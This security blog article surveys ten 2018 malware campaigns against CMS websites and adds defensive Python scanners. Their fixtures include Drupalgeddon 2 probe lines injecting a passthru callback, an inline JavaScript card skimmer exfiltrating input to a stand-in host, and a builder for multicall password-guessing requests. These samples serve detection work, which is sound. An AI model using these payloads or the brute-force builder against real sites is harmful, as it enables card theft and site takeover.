Top 10 Malware Campaigns against WordPress, Drupal and Joomla websites in 2018


In 2018, websites running the popular CMSs were compromised in huge numbers and put to criminal use: SEO spam, malvertising, payment card skimming, cryptomining and the distribution of banking trojans and ransomware.

Third-party content management systems (CMSs) power by far the largest share of websites on the internet, the leading examples being WordPress, Joomla and Drupal. They are used by individual bloggers, large-scale content publishers and even the largest corporations.

They are also the most attacked category of website. One recent report estimated that, even among up-to-date and patched sites, as many as 46% of WordPress, 19% of Joomla and 18% of Drupal installations carried some form of malware. The entries below show why a patched core is not enough: most of the damage came through plugins and extensions, weak administrator credentials and injected code rather than through core vulnerabilities.

Here we look at ten of the most interesting or important malware families and campaigns directed against CMS platforms during 2018.

10: BabaYaga – the Anti-Virus Virus

When: June 2018

Which Platform: WordPress, Joomla, Drupal

BabaYaga, a WordPress-focused malware discovered by Defiant's Wordfence team in June, may be one of the least harmful campaigns of 2018, but it is noteworthy as a curiosity because its behavior is highly unusual, perhaps even unique, among malware. Technically it was sophisticated: scan evasion and self-reinfection routines placed it among the stickiest and most troublesome infections to remove. The payload, however, was nothing more sinister than an affiliate marketing scheme.

Infected sites would host hidden pages full of SEO spam designed to attract search engines, and visitors would be redirected to irrelevant online stores. The attacker presumably earned a commission on any purchases made. BabaYaga’s most curious features, however, included functionality to otherwise preserve and protect infected sites. WordPress sites would be kept automatically updated by the malware, which even made file backups in case of an update failure. The cherry on top was BabaYaga’s ability to remove other malware that might make its way on to the site, making it an unusual example of an antivirus-virus.

9: DotNetNuke Cryptomining Network

When: January 2018

Which Platform: DotNetNuke

Cryptocurrency was a hot topic throughout 2018, and even as the year began malicious actors were already hijacking other people's computing resources to mine it. Starting in December 2017 with the same Apache Struts vulnerability behind the Equifax breach (CVE-2017-5638), an unknown threat actor was building a malicious mining network.

In January 2018 the same actor began exploiting a second flaw, a deserialization vulnerability in the DotNetNuke CMS (CVE-2017-9822). Both bugs give remote code execution on the web server, and the payload was a Monero mining application installed on the compromised servers, all of it paying into a single Monero wallet. By the end of January the attacker had earned over $12,000 in Monero on stolen CPU cycles and stolen electricity.

8: XSS Campaign Targets WordPress Plugin

When: November 2018

Which Platform: WordPress

WordPress is the world's most widely used CMS, and the modular, plugin-based structure of its sites means that plugins are as viable a target as the platform itself. In fact, plugin vulnerabilities and exploits occur far more often than vulnerabilities in WordPress core. This was the case with the Accelerated Mobile Pages plugin, AMP for WP.

Identified by the Wordfence team in November, AMP for WP let any logged-in user, down to the 'Subscriber' role, change the plugin's settings and inject arbitrary HTML and JavaScript into the site (stored XSS). The root cause was a missing capability check: the plugin's AJAX handler verified a nonce, but a nonce only shows that a request came from the site's own pages, not that the caller is an administrator, so any authenticated user could reach it. A script injected this way runs in whatever session views it, and in an administrator's session it can do anything the administrator can, including creating new administrator accounts. The flaw was patched very swiftly, but not every site owner keeps plugins rigorously up to date, and with over 100,000 active installations at the time there was plenty of scope for older versions to be exploited.

7: Exploited Vulnerability in GDPR Plugin

When: November 2018

Which Platform: WordPress

This is a returning guest from last week's list of the top 10 GDPR-related incidents in 2018. There is an unfortunate irony in a plugin written for compliance introducing a new vulnerability, but the risk from this flaw was no joke, especially given the plugin's popularity: over 100,000 active installations at the time Wordfence discovered it.

The bug was a privilege escalation: the plugin's AJAX handler let an unauthenticated visitor overwrite arbitrary WordPress options. Attackers used it to switch on user registration and set the default role for new users to 'administrator', registered themselves an administrator account, and then often reverted the two settings to hide the change. With administrator access they could take complete control of the site and plant persistent backdoors. The vulnerability was patched quickly, but, based on observed changes to affected websites' URLs, it may have been exploited on approximately 5,000 WordPress sites.
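Both of the plugin flaws above end the same way: an attacker-controlled administrator account on a site whose core was fully patched. The triage script below is an added example, not code from Wordfence or either plugin. It assumes you have exported the wp_options, wp_users and wp_usermeta tables (for instance with a SQL dump) and runs the three checks an incident responder wants first: registration opened with an administrator default role, rewritten siteurl/home options, and administrator accounts registered after a given date. The table rows, user names and dates are constructed for the example; the serialized wp_capabilities format is the real one WordPress writes.

```python
import re
from datetime import datetime

# Constructed sample rows, shaped like exports from wp_options, wp_users and
# wp_usermeta of a site hit through an options-overwrite bug such as the one in
# WP GDPR Compliance. A real export would come from a SQL dump or `wp db query`.
OPTIONS = {
    "users_can_register": "1",          # attacker switched registration on
    "default_role": "administrator",    # ...and made every new account an administrator
    "siteurl": "https://shop.example",
    "home": "https://shop.example",
}
USERS = [
    {"ID": 1, "user_login": "owner",  "user_registered": "2016-03-02 10:11:12"},
    {"ID": 2, "user_login": "editor", "user_registered": "2017-08-14 09:00:00"},
    {"ID": 9, "user_login": "t2x9q",  "user_registered": "2018-11-09 03:17:44"},
]
# wp_capabilities is a PHP-serialized array, e.g. a:1:{s:13:"administrator";b:1;}
USERMETA = {
    1: 'a:1:{s:13:"administrator";b:1;}',
    2: 'a:1:{s:6:"editor";b:1;}',
    9: 'a:1:{s:13:"administrator";b:1;}',
}

_ROLE_RE = re.compile(r's:\d+:"([^"]+)";b:1;')
_TS = "%Y-%m-%d %H:%M:%S"


def roles_from_capabilities(serialized):
    """Role names from a wp_capabilities value. Only the flat array shape
    WordPress writes is handled; a full PHP unserializer is not needed here."""
    return set(_ROLE_RE.findall(serialized))


def find_indicators(options, users, usermeta, since, expected_url):
    """Findings (strings) for the post-exploitation pattern described above:
    registration opened with an administrator default role, rewritten site
    URLs, and administrator accounts registered on or after `since`."""
    findings = []
    open_reg = options.get("users_can_register") == "1"
    admin_default = options.get("default_role") == "administrator"
    if open_reg and admin_default:
        findings.append("registration open with default_role=administrator")
    elif admin_default:
        findings.append("default_role=administrator (registration closed; attacker may have reverted it)")
    for name in ("siteurl", "home"):
        if options.get(name) != expected_url:
            findings.append(f"{name} changed to {options.get(name)!r}")
    admin_ids = {uid for uid, caps in usermeta.items()
                 if "administrator" in roles_from_capabilities(caps)}
    cutoff = datetime.strptime(since, _TS)
    for user in users:
        registered = datetime.strptime(user["user_registered"], _TS)
        if user["ID"] in admin_ids and registered >= cutoff:
            findings.append(f"administrator {user['user_login']!r} registered {user['user_registered']}")
    return findings


def triage():
    """Run the checks over the constructed tables. The window start is an
    assumed date close to the plugin's fix; use the real disclosure date."""
    return find_indicators(OPTIONS, USERS, USERMETA,
                           since="2018-11-07 00:00:00",
                           expected_url="https://shop.example")


if __name__ == "__main__":
    for finding in triage():
        print("FINDING:", finding)
```

Two findings come back for the constructed data: the open-registration/administrator-default combination and the administrator account created two days into the window. The `elif` branch matters in practice because attackers who revert `users_can_register` tend to leave `default_role` behind, and a rogue administrator still has to be removed even when every option looks normal again, which is why the user table check does not depend on the options check.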

6: Magento’s Re-infecting Malware

When: April 2018 onwards

Which Platform: Magento

Magento is an open-source CMS focused on e-commerce. It is considered one of the leading e-commerce platforms on the internet today and claims that $155 billion of transactions passed through the platform in 2018. Any vulnerability in it, or any weakness in how a store is run, is therefore very valuable to attackers.

And 2018 was a busy year for Magento attackers. The first incident came in April, when over 1,000 Magento stores were found infected with malware that scraped payment card data or ran cryptojacking scripts. Cleanups did not end the campaign: in June it emerged that previously cleaned stores were being reinfected, because the attackers had hidden additional code in the CMS's config.php, where file scanners were not looking for it. Even as late as November, a Magento store cleaned of this or other malware was being reinfected after an average of 10.5 days.

5: Drupalgeddon 2 (and 3)

When: March 2018 onwards

Which Platform: Drupal

In 2014, Drupal suffered one of the most destructive vulnerabilities ever seen in a CMS. Dubbed 'Drupageddon' (the spelling 'Drupalgeddon' came into use with the later events) because of its magnitude, it was an SQL injection flaw in Drupal 7 core (CVE-2014-3704) that allowed remote code execution (RCE), backdoor installation, privilege escalation and more. Exploitation was so fast and widespread that, despite a quick patch, the Drupal security team told site owners that any site not updated within seven hours of the patch's release should be considered compromised.

Drupal fixed that flaw and the platform survived. Then, in March 2018, a similar vulnerability surfaced and was quickly named Drupalgeddon 2 (CVE-2018-7600): an unauthenticated RCE flaw in the way the Form API handled render-array keys in user input, affecting Drupal 6, 7 and 8. A patch shipped with the advisory, but proof-of-concept exploits followed within weeks and mass exploitation began within hours of their publication. Even months later, in June, security researcher Troy Mursch found over 115,000 Drupal sites still unpatched and hundreds of ongoing infections. The situation was compounded in April when a second RCE flaw (CVE-2018-7602) was disclosed and exploited within hours; it is sometimes lumped in with Drupalgeddon 2 and sometimes reported as Drupalgeddon 3.

“It has been a while since such a dangerous and easily exploitable RCE vulnerability has been discovered on such a popular CMS as Drupal,” commented High-Tech Bridge’s CEO, Ilia Kolochenko, at the time. He warned that the exploit was so simple and so severe that it would be exploited in the wild within hours.

“Breached websites will likely be used for data theft and further password reuse attacks, as well as for watering hole attacks to distribute ransomware and cryptominers,” he added.
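The Drupalgeddon 2 exploits all work the same way: they smuggle a Form API key beginning with '#' (such as '#post_render' with a PHP function name as its value) into user input, which no legitimate request ever does. That makes the probes easy to spot in web server logs after the fact. The scanner below is an added example, not Drupal project code or any published detection rule; the three log lines are constructed to mirror the shape of the public Drupal 7 and Drupal 8 probes (the IP addresses and user agents are invented), and it assumes combined-format access logs.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed access-log lines (combined log format). The first two mirror the
# shape of public Drupalgeddon 2 probes against Drupal 7 and Drupal 8; the
# third is ordinary traffic. No real sites or attackers are represented.
SAMPLE_LOG = [
    '203.0.113.5 - - [14/Apr/2018:08:12:01 +0000] "POST /?q=user/password&name[%23post_render][]=passthru&name[%23type]=markup&name[%23markup]=id HTTP/1.1" 200 512 "-" "python-requests/2.18.4"',
    '203.0.113.5 - - [14/Apr/2018:08:12:02 +0000] "POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1" 200 1284 "-" "python-requests/2.18.4"',
    '198.51.100.7 - - [14/Apr/2018:08:13:10 +0000] "GET /node/12?page=2 HTTP/1.1" 200 8812 "-" "Mozilla/5.0"',
]

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Drupal render-array keys start with '#'. Legitimate requests never carry them
# in user input; the exploits rely on callback keys such as these.
CALLBACK_KEYS = {"#post_render", "#pre_render", "#lazy_builder", "#access_callback"}


def analyse_request(target):
    """Return (indicator, detail) for a Drupalgeddon 2 pattern in the request
    target, or None. parse_qsl percent-decodes keys and values, so %23 is '#'."""
    query = urlsplit(target).query
    for key, value in parse_qsl(query, keep_blank_values=True):
        m = re.search(r"\[(#[a-z_]+)\]", key)
        if m:
            tag = "callback injection" if m.group(1) in CALLBACK_KEYS else "render-array key"
            return (tag, f"{m.group(1)}={value}")
        # Drupal 8 form: the callback travels in the POST body, but the
        # element_parents query parameter with a '#' segment is still visible.
        if key == "element_parents" and "#" in value:
            return ("element_parents with '#' segment", value)
    return None


def scan(lines):
    """Run analyse_request over log lines; return one dict per hit."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        result = analyse_request(m["target"])
        if result:
            hits.append({"ip": m["ip"], "time": m["ts"], "status": int(m["status"]),
                         "indicator": result[0], "detail": result[1]})
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

The caveat a responder needs: access logs record the query string but not the POST body, and the Drupal 8 exploit puts its callback key in the body. The `element_parents` parameter is the only part of that request the log keeps, so a hit on it with a 200 status on an unpatched site means the body must be assumed to have carried a payload, and the site treated as compromised rather than merely probed.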

4: MagentoCore Bank Card Skimmer

When: August/September 2018

Which Platform: Magento

Bigger than the self-reinfecting campaign, Magento's largest security incident came in late August and early September with the malware that became known as MagentoCore. Uncommonly aggressive and successful, the skimmer script was found on over 5,000 domains simultaneously at its peak.

The malware got onto a store by brute-forcing the administrative control panel. Once in, the attacker changed the passwords of other accounts to lock out the legitimate admins, then embedded a JavaScript skimmer in the store's pages: a keylogger that recorded what customers typed into payment forms and sent the card details to a server under the attacker's control.
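Whether the injected code is a skimmer like MagentoCore or the hidden loader behind the reinfection campaign above, the symptom on the storefront is the same: a script the store owner did not put there, either loaded from a foreign host or inlined into the page. The scanner below is an added example, not code from Magento or from the researchers who tracked these campaigns. It assumes you can fetch your own checkout page HTML and know which script hosts are legitimate; the sample page, the host names (shop.example, cdn.example, skimmer.example) and the inline skimmer snippet are all constructed for the example, and the keyword heuristics are the author's own, not a published signature.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed checkout page: two legitimate scripts, one harmless inline
# snippet, one foreign skimmer script and one inline skimmer. Not a real store.
SAMPLE_HTML = """<html><head>
<script src="/static/frontend/Magento/luma/en_US/requirejs/require.js"></script>
<script src="https://cdn.example/analytics.js"></script>
<script>window.dataLayer = window.dataLayer || [];</script>
<script type="text/javascript" src="https://skimmer.example/mage/mage.js"></script>
</head><body>
<form id="co-payment-form"><input name="cc_number"><input name="cc_cid"></form>
<script>
document.addEventListener('keyup', function () {
  var d = '';
  document.querySelectorAll('input').forEach(function (i) { d += i.name + '=' + i.value + '&'; });
  new Image().src = 'https://skimmer.example/c?' + btoa(d);
});
</script>
</body></html>"""


class ScriptCollector(HTMLParser):
    """Collect external script URLs and inline script bodies from a page."""

    def __init__(self):
        super().__init__()
        self.external, self.inline = [], []
        self._in_script, self._buf = False, []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.external.append(src)
            else:
                self._in_script, self._buf = True, []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self.inline.append("".join(self._buf))
            self._in_script = False


# Heuristics (author's own): a skimmer both harvests form input and ships it out.
COLLECT_PATTERNS = [
    r"addEventListener\(['\"](?:keyup|keydown|input|change|submit)",
    r"querySelectorAll\(['\"]input",
    r"\.value\b",
    r"cc_number|cc_cid|cvv|expir",
]
EXFIL_PATTERNS = [
    r"new Image\(\)\.src",
    r"XMLHttpRequest|fetch\(|sendBeacon\(",
    r"\bbtoa\(|fromCharCode\(|unescape\(",
    r"https?://",
]


def inline_score(js):
    """(collection indicators, exfiltration indicators) found in a script body."""
    collect = sum(1 for p in COLLECT_PATTERNS if re.search(p, js))
    exfil = sum(1 for p in EXFIL_PATTERNS if re.search(p, js))
    return collect, exfil


def scan_page(html, site_host, allowed_hosts):
    """Findings as (kind, detail): scripts loaded from hosts outside the
    allowlist, and inline scripts that both collect input and exfiltrate."""
    parser = ScriptCollector()
    parser.feed(html)
    findings = []
    for src in parser.external:
        host = urlsplit(src).hostname or site_host   # relative URLs load from the site itself
        if host != site_host and host not in allowed_hosts:
            findings.append(("external-script", src))
    for js in parser.inline:
        collect, exfil = inline_score(js)
        if collect >= 2 and exfil >= 2:
            findings.append(("inline-skimmer", js.strip()[:60]))
    return findings


if __name__ == "__main__":
    for kind, detail in scan_page(SAMPLE_HTML, "shop.example", {"cdn.example"}):
        print(f"{kind}: {detail}")
```

The allowlist check is the same decision a browser makes under a Content Security Policy `script-src` directive, which is why CSP is the standing mitigation for this class of injection: a foreign `<script src>` that this scanner flags after the fact is one the browser would simply refuse to load under a policy that names only the store's own hosts. The inline heuristics are deliberately loose and will miss obfuscated skimmers; treat them as a prompt to read the script, not as proof of its absence.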

3: FakeUpdates Campaigns Deliver Banking Malware

When: December 2017 - April 2018

Which Platforms: Joomla, WordPress, SquareSpace, Drupal

The more popular a CMS becomes, the more often its users can expect to be attacked. Because the platforms differ in architecture, an individual attack is usually confined to a single CMS, but some campaigns work across several, and the FakeUpdates campaign of the first quarter of 2018 was one of them.

Infected sites, primarily WordPress but also Joomla, Drupal and SquareSpace, redirected visitors to a spoofed software update page hosted on another compromised website, usually tailored to the visitor's browser. A visitor who accepted the fake update received a trojan on their machine: usually the Chthonic banking malware, though the NetSupport remote access trojan was also reported.

2: Master134’s Malvertising Network

When: July 2018

Which Platform: WordPress

In July, Check Point Research uncovered what may well be the biggest fraudulent advertising and malware distribution scheme of 2018. Using 10,000 or more compromised WordPress sites, the scheme redirected their visitors to a website run by the attacker. That stream of stolen traffic made the site look like a legitimate, well-visited publisher to AdsTerra, a real-time bidding platform for advertisers. But there was more to the scheme than fraudulent advertising revenue.

With a 'good' reputation fueled by stolen traffic, Master134 (Check Point's name for the operator) was able to sell that traffic as advertising space through AdsTerra, and the 'advertisers' buying it were malware operators. What the redirected visitors got was malvertising: pages carrying drive-by malware, including trojans, ransomware and bots.

1: Botnet Makes WordPress Sites Attack WordPress Sites

When: December 2018

Which Platform: WordPress

WordPress plugins tend to be more vulnerable and more frequently attacked than the core WordPress framework, but not always. If attackers find a way to breach an up-to-date WordPress installation, every other WordPress site is exposed to the same attack. Sometimes these attacks need no vulnerability at all, zero-day or otherwise, and simply brute-force the login, as with December's large-scale, organized botnet.

Discovered by the Wordfence team, the botnet ran dictionary-based brute-force attacks against the logins of targeted WordPress sites, sending its guesses through the XML-RPC interface, whose system.multicall method lets a single HTTP request carry hundreds of username and password combinations. The wordlists were generated per target from the site's own domain name and usernames combined with common patterns and suffixes. Where a guess succeeded, the attacker planted code on the site that enrolled it in the botnet to attack other WordPress sites. By the time Wordfence discovered and began to combat it, the botnet already contained 20,000 infected sites.
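The amplification trick that made this botnet efficient, many credential guesses packed into one XML-RPC request, is also what makes it easy to detect at the web server or WAF: a legitimate XML-RPC client never sends dozens of different passwords for the same account in one call. The detector below is an added example, not Wordfence's code or WordPress project code. It parses a system.multicall body, counts the calls that present credentials, and flags the request when it carries several guesses with differing passwords. The XML-RPC method names are real WordPress ones; the request fixture and the guessed passwords are constructed here to resemble the botnet's per-site wordlists, not captured traffic.

```python
import xml.etree.ElementTree as ET
from collections import Counter

# WordPress XML-RPC methods whose first two parameters are (username, password),
# so any of them can be used to test a credential.
AUTH_METHODS = {"wp.getUsersBlogs", "wp.getProfile", "wp.getUsers", "wp.getPosts",
                "metaWeblog.getUsersBlogs", "blogger.getUsersBlogs"}


def _scalar(value_el):
    """Text of an XML-RPC <value>: either the wrapped <string>/<int> child or
    the bare text (XML-RPC treats an untyped value as a string)."""
    child = next(iter(value_el), None)
    return (child.text if child is not None else value_el.text) or ""


def parse_multicall(body):
    """(methodName, [params...]) for each call inside a system.multicall
    request body; an empty list for anything else, including plain calls."""
    root = ET.fromstring(body)
    if root.tag != "methodCall" or root.findtext("methodName") != "system.multicall":
        return []
    calls = []
    for struct in root.findall("./params/param/value/array/data/value/struct"):
        name, args = None, []
        for member in struct.findall("member"):
            label = member.findtext("name")
            value = member.find("value")
            if label == "methodName":
                name = _scalar(value)
            elif label == "params":
                args = [_scalar(v) for v in value.findall("./array/data/value")]
        calls.append((name, args))
    return calls


def assess(body, threshold=5):
    """Summarise credential-testing calls in one request. brute_force is set
    when the request carries at least `threshold` guesses with more than one
    distinct password; a real client retries with the same credentials."""
    calls = parse_multicall(body)
    attempts = [(a[0], a[1]) for name, a in calls if name in AUTH_METHODS and len(a) >= 2]
    passwords = {p for _, p in attempts}
    return {
        "calls": len(calls),
        "auth_attempts": len(attempts),
        "usernames": dict(Counter(u for u, _ in attempts)),
        "distinct_passwords": len(passwords),
        "brute_force": len(attempts) >= threshold and len(passwords) > 1,
    }


def build_multicall(guesses):
    """Constructed fixture: a system.multicall body that tries each
    (user, password) guess via wp.getUsersBlogs, the shape of an amplified
    brute-force request. Used here only to exercise the detector."""
    call = ("<value><struct>"
            "<member><name>methodName</name><value><string>wp.getUsersBlogs</string></value></member>"
            "<member><name>params</name><value><array><data>"
            "<value><string>{u}</string></value><value><string>{p}</string></value>"
            "</data></array></value></member></struct></value>")
    return ("<methodCall><methodName>system.multicall</methodName><params><param>"
            "<value><array><data>" + "".join(call.format(u=u, p=p) for u, p in guesses)
            + "</data></array></value></param></params></methodCall>")


# Dictionary shaped like the botnet's per-site wordlists: the account name and
# the site name with common year and number suffixes. Constructed, not captured.
SAMPLE_GUESSES = [("admin", "admin"), ("admin", "admin1"), ("admin", "admin2018"),
                  ("admin", "shop"), ("admin", "shop2018"), ("admin", "password")]

if __name__ == "__main__":
    print(assess(build_multicall(SAMPLE_GUESSES)))
```

A request flagged this way is worth blocking at the source IP, and if nothing on the site uses XML-RPC (the mobile app, Jetpack and remote publishing clients do), denying xmlrpc.php at the web server removes the amplification entirely. Note what the detector does not do: it cannot tell whether any guess succeeded, so a flagged request against an account with a weak password still means checking that account, which is where the advice on strong, unique admin passwords and two-factor authentication below comes in.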

There is no silver bullet that will keep a CMS website secure. Nevertheless, Ilia Kolochenko offers this advice: “Keeping a CMS and all its components up-to-date is vital to maintain website security. A WAF can help mitigate, or at least reduce, the exploitability of unknown vulnerabilities or vulnerabilities in custom code.

“Web server security hardening with Content Security Policy and similar security mechanisms can prevent many common exploitation vectors such as XSS and CSRF. Obviously, admin passwords must be strong and unique, and two-factor authentication will never harm.

“Last but not least, continuous security monitoring has become a de facto standard to ensure web application security. Sometimes you, or your colleagues, may just forget something – four eyes are always better than two.”

Test your web server security hardening, Content Security Policy (CSP) and CMS security with free ImmuniWeb® WebScan.